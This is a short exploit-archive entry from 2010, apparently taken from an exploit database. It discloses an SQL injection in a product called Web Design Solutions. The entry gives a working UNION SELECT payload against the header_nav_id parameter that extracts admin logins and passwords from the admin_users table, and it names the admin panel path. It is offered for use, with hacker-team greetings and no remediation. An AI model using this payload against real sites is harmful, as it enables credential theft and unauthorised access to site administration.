[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Web Design Solutions SQL Injection Vulnerabilities
# Published : 2010-05-14
# Author : me masters
# Previous Title : Heaven Soft CMS v 4.7 SQL Injection Vulnerability
# Next Title : Online Job Board (Auth Bypass) SQL Injection Vulnerability
######################JAI HIND ######################
[~] Tybe: SQL Injection Vulnerabilities
[~] Vendor: http://www.webdesignsolution.co.uk
[+] author: << ?? >> ??s???s
[+] TEAM: H.O.H------ICW--------ANDHRAHACKERS
[~] D0rk: Us3 ur brain
[?] contact: rdon111 AT gmail.com
======================================================================================
# SQL Injection #
======================================================================================
http://127.0.0.1/index.php?header_nav_id= [SQLI]
admin link:
http://127.0.0.1/admin
proof = http://site.com/index.php?header_nav_id=-1 union all select
1,2,3,4,5,6,7,group_concat(login,0x3a,password) from admin_users--
Greetz && Thanks = I-H Guru anuja parvez :)